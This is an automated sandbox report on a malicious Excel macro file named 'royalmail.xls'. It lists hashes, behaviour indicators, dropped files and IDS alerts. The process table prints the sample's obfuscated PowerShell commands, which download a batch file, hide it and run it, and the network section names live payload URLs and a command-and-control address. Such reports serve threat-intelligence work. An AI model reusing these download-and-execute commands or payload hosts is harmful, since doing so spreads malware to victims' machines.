analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

royalmail.xls

Full analysis: https://app.any.run/tasks/84328043-95f2-4f9e-8194-41425df0809f
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: November 30, 2020, 01:12:59
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
trojan
opendir
loader
Indicators:
MIME: application/vnd.ms-excel
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Last Saved By: Dexter MORGAN, Create Time/Date: Sun Sep 20 22:17:44 2020, Last Saved Time/Date: Sat Oct 31 02:12:40 2020, Security: 1, Author: Dexter MORGAN
MD5:

C9D3EB5669048D2E504109B785E45183

SHA1:

37951F4D601C647C284A431B582F5AEBC3D0E13E

SHA256:

26FDDAC270B07F7658D6752B185CB7B34CD3CC28B60DDD04C3125FF177F1A661

SSDEEP:

1536:uMnSGiysRchNXHfA1MiWhZFGkEld+Dr7WmSb4wIE7zp0RhBv1hQz7rT015c:uMnSGiysRchNXHfA1MiWhZFGkEld+DrS

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • cmd.exe (PID: 2548)
      • cmd.exe (PID: 2904)
      • cmd.exe (PID: 2312)
      • cmd.exe (PID: 1424)
      • cmd.exe (PID: 3128)
      • cmd.exe (PID: 1388)
    • Starts CMD.EXE for commands execution

      • EXCEL.EXE (PID: 2200)
    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 2200)
    • Application was dropped or rewritten from another process

      • ernm.exe (PID: 3788)
      • rm.exe (PID: 3092)
      • ernm.exe (PID: 1948)
    • Drops executable file immediately after starts

      • notepad.exe (PID: 1408)
    • Writes to a start menu file

      • notepad.exe (PID: 1408)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2492)
      • powershell.exe (PID: 2584)
      • powershell.exe (PID: 2340)
      • powershell.exe (PID: 892)
      • powershell.exe (PID: 336)
      • powershell.exe (PID: 2680)
      • notepad.exe (PID: 1408)
    • Uses ATTRIB.EXE to modify file attributes

      • powershell.exe (PID: 336)
    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 2584)
      • cmd.exe (PID: 2732)
    • Application launched itself

      • cmd.exe (PID: 2732)
      • ernm.exe (PID: 3788)
    • Drops a file with too old compile date

      • powershell.exe (PID: 2680)
      • notepad.exe (PID: 1408)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2680)
      • notepad.exe (PID: 1408)
  • INFO

    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 2200)
    • Reads settings of System Certificates

      • powershell.exe (PID: 892)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xls | Microsoft Excel sheet (78.9)

EXIF

FlashPix

HeadingPairs:
  • Feuilles de calcul
  • 1
  • Macros Excel 4.0
  • 1
TitleOfParts:
  • Feuil1
  • Macro1
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CodePage: Windows Latin 1 (Western European)
Author: Dexter MORGAN
Security: Password protected
ModifyDate: 2020:10:31 02:12:40
CreateDate: 2020:09:20 21:17:44
LastModifiedBy: Dexter MORGAN
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
60
Monitored processes
21
Malicious processes
10
Suspicious processes
2

Behavior graph

Click at the process to see the details
start drop and start drop and start excel.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe attrib.exe no specs cmd.exe no specs mode.com no specs cmd.exe no specs cmd.exe no specs powershell.exe rm.exe no specs notepad.exe ernm.exe no specs ernm.exe

Process information

PID
CMD
Path
Indicators
Parent process
2200"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Version:
14.0.6024.1000
2904cmd /c power^shell -w 1 stARt`-slE`Ep 3; Move-Item "pd.bat" -Destination "$e`nV:T`EMP"C:\Windows\system32\cmd.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2548cmd /c power^shell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -ForceC:\Windows\system32\cmd.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2312cmd /c power^shell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.batC:\Windows\system32\cmd.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1424cmd /c power^shell -w 1 stARt`-slE`Ep 7;cd "$e`nV:T`EMP; ./pd.bat"C:\Windows\system32\cmd.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3128cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile')."Invoke"('https://cutt.ly/7hjYLER','pd.bat')C:\Windows\system32\cmd.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2492powershell -w 1 stARt`-slE`Ep 3; Move-Item "pd.bat" -Destination "$e`nV:T`EMP"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2340powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -ForceC:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
336powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.batC:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2584powershell -w 1 stARt`-slE`Ep 7;cd "$e`nV:T`EMP; ./pd.bat"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
2 552
Read events
2 148
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
10
Text files
2
Unknown types
0

Dropped files

PID
Process
Filename
Type
2200EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR4187.tmp.cvr
MD5:
SHA256:
2492powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JRMLOKJETFSQNRFHAHME.temp
MD5:
SHA256:
2340powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JG33PA0DC60ET8AHATD9.temp
MD5:
SHA256:
2584powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6BXYF8NPXJUQZEI1O6X9.temp
MD5:
SHA256:
892powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TAIQ2GVRCJMDQ9HO74LR.temp
MD5:
SHA256:
336powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VU2XB51LWAT88AKNHB2R.temp
MD5:
SHA256:
2680powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FUXF9T4PP3LI9ZBJ8P26.temp
MD5:
SHA256:
1408notepad.exeC:\Users\admin\AppData\Roaming\rtgb\ernm.exe:ZoneIdentifier
MD5:
SHA256:
892powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF154d10.TMPbinary
MD5:0D6446454B8F30B91D30E67B31109113
SHA256:87AE20D7660542222B0528A9059099218C27B464B8524BAA3DFDEF04EAEE955D
2680powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF156c9e.TMPbinary
MD5:0D6446454B8F30B91D30E67B31109113
SHA256:87AE20D7660542222B0528A9059099218C27B464B8524BAA3DFDEF04EAEE955D
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
14
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
892
powershell.exe
GET
200
193.239.147.76:80
http://193.239.147.76/bat/scriptxls_368abcae-104a-4972-8945-a2c7f7dfd200_mic12_wddisabler.bat
unknown
text
2.06 Kb
malicious
2680
powershell.exe
GET
200
176.126.200.6:80
http://medicalcorp.ro/royal1/helper/gd/zt/fola.exe
RO
executable
4.68 Mb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2680
powershell.exe
176.126.200.6:80
medicalcorp.ro
CHML Web Services SRL
RO
suspicious
1948
ernm.exe
185.157.161.109:1973
Obenetwork AB
SE
suspicious
892
powershell.exe
193.239.147.76:80
malicious
892
powershell.exe
104.22.1.232:443
cutt.ly
Cloudflare Inc
US
suspicious

DNS requests

Domain
IP
Reputation
cutt.ly
  • 104.22.1.232
  • 104.22.0.232
  • 172.67.8.238
whitelisted
medicalcorp.ro
  • 176.126.200.6
suspicious

Threats

PID
Process
Class
Message
2680
powershell.exe
Potential Corporate Privacy Violation
AV POLICY HTTP request for .exe file with no User-Agent
2680
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2680
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
1 ETPRO signatures available at the full report
No debug info